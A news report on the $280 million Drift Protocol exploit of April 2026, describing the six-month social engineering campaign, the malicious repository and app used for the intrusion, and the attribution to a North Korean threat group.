Drift Protocol's $280M Hack Traced to Six-Month North Korean Social Engineering Campaign

Drift Protocol has revealed details surrounding a devastating $280 million exploit that occurred on April 1, 2026, exposing a sophisticated, long-running cyberattack linked to North Korean state-sponsored hackers. The decentralized exchange confirmed the breach involved months of calculated social engineering, malicious software distribution, and deep trust-building tactics before any funds were touched.

The scheme reportedly began in October 2025 at a major crypto industry conference, where threat actors posing as a legitimate quantitative trading firm made initial contact with Drift contributors. Rather than executing a quick attack, the group played a long game — engaging with contributors across multiple global events over six months, presenting convincing professional credentials and demonstrating genuine technical knowledge throughout.

The attackers established a Telegram group to maintain ongoing communication, discussing trading strategies and vault integrations that mirrored standard industry onboarding practices. Between December 2025 and January 2026, they even deposited over $1 million into the protocol to build credibility and deepen trust within the ecosystem.

The intrusion itself came through malicious tools shared during collaboration sessions. One contributor cloned a compromised code repository disguised as a frontend deployment tool, while another downloaded a tampered TestFlight application marketed as a wallet product. These actions exploited a known vulnerability in VSCode and Cursor, allowing silent code execution on affected devices between December 2025 and February 2026. Attackers wiped all communication channels and malware immediately after executing the exploit.

Forensic analysis conducted with support from Mandiant and SEALs 911 linked the attack with medium-high confidence to UNC4736, also known as Citrine Sleet or AppleJeus — the same threat group behind the October 2024 Radiant Capital hack. On-chain fund flows further corroborated ties to previous DPRK-affiliated operations. Drift Protocol has since frozen protocol functions, restructured its multisig wallet access, and is actively cooperating with law enforcement to pursue those responsible.